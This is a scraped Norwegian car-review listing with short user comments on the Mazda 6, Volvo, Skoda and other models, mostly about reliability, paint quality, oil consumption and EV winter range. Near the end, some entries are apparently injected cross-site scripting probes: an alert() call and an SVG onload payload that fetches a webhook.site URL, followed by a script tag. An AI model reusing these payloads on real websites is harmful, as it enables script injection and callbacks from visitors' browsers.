Vurdert av Olet
Mazda 6 (2012)
10
Mazda 6 (2012)
Feilfri i 8 år- knallbra kvalitet og driftssikkerhet . Bra seter og sittestilling. Litt mye dekkstøy.
Mazda 6 (2012)
Ok bil å kjøre og eie. Stort minus er den dårlige lakken! Kjøre du borti ett gress strå så blir det riper i lakken. Lakken må korrigeres med maskin en gang pr år for at den skal holde seg bra.
Mazda 6 (2012)
En super bil. Spesielt med tanke på prisen. Det er noe hardplastdettaljer og lite jåleri, men det funker. Ellers kunne støyisoleringen i kupeen vert bedre, men med riktige dekk og litt understells
Mazda 6 (2012)
Moro bil å kjøre med god driftssikkerhet.
Mazda 6 (2011)
jeg kjøpte bilen i 2013 av en kjøreskole. da var den gått 130 000 km. nå har den passert 260 000 km. 2 år siden så byttet jeg begge hjullagrene fremme for første gang. i fjor byttet jeg xenon
Mazda 6 (2011)
Ingen feil på 10 år og 170.000 km.
Mazda 6 (2011)
Bilen er bedre enn ryktet. Burde bli vurdert blant kjøpere av andre biler i samme størrelse. Kanskje litt svak lakk ved steinsprut, men har sett at det er slik med nesten alle andre merker. Mulig de
Mazda 6 (2010)
Bensin motor litt tørst på olje.
Mazda 6 (2010)
Bensin motor litt tørst på olje.
Mazda 6 (2010)
Bensin motor litt tørst på olje.
Mazda 6 (2010)
Driftssikker og godt utstyrt bil.
Mazda 6 (2010)
Høyt oljeforbruk trekker ned.
Mazda 6 (2010)
Bilen er tight å kjøre, og du føler deg meget trygg. Den har ikke bagasjeplassen til en Superb, men hakket under. Den er driftsikker, og den er ikke av de dyreste bilene i denne klassen.
Mazda 6 (2010)
OK bil. Utrolig driftsikker. Gått over 200000 km som skolebil. Lettkjørt og elevene liker bilen godt. Små bagatellmessige problemer. Kunne godt vært sterkere motor.
Volvo XC40 (2024)
Veldig fornøyd med bil, komfort og spesielt støy som er lavere enn de fleste biler i denne klasse/ pris. Ingen problemer med bilen!
Skoda Enyaq (2025)
Brukt som drosje, har per nå 75000km. Veldig stor oppgradering å få batterivarme. Regenerativ bremsing anbefales ikke på vinterføre. Får minus på forbruk da bilen gir meg 270-330km på kaldeste
Volvo EX30 (2025)
Mekanisk fin bil men med et makkverk av software som er full av feil. Se Volvo ex30 forum for tidenes lengste og gjentakende feil rapporter. Volvo ser ikke ut til å være interessert å ordne opp des
Skoda Enyaq (2023)
Syns utseende å bilen er tøff, ellers kan jeg ikke sa hva den skal være bedre på enn sine konkurrenter. Sitte stillingen passer meg dårlig, men fruen liker det. Pluss at den har soltak Elendi
Mazda CX-5 (2013)
Bilens største utfordring med skyactive motor er relatert til partikkelfilter, koksing av inntaksmanifold og tett sumpfilter, som kan lede til havari. Annet er utkobling av turbo på grunn av feil ve
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.